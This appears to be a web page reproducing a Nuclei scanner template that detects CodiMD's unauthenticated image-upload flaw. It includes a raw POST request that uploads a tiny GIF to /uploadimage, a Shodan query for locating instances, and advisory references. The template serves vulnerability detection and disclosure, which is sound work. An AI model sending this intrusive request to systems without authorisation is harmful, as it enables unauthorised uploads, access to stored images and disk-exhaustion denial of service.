CodiMD - File Upload

ID: codimd-unauth-file-upload

Severity: medium

Author: denandz,PulseSecurity.co.nz

Tags: file-upload,intrusive,codimd

Description

CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image’s URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.

YAML Source

id: codimd-unauth-file-upload

info:
  name: CodiMD - File Upload
  author: denandz,PulseSecurity.co.nz
  severity: medium
  description: |
    CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.
  reference:
    - https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
    - https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
  metadata:
    max-request: 1
    verified: true
    shodan-query: html:"CodiMD"
  tags: file-upload,intrusive,codimd

http:
  - raw:
      - |
        POST /uploadimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161

        -----------------------------92633278134516118923780781161
        Content-Disposition: form-data; name="image"; filename="{{randstr}}.gif"
        Content-Type: image/gif

        {{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
        -----------------------------92633278134516118923780781161--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '"link":".*?.gif"'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"link":"(.*)"'
# digest: 4a0a00473045022100ef428961687368873537e6000fdd68686cadc910b6becdbba641b4d26a532d4102202e2b8c020d96ee350519c007eeeceb62b43ca94390f272611b8671b254a05642:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/codimd-file-upload.yaml"

View on Github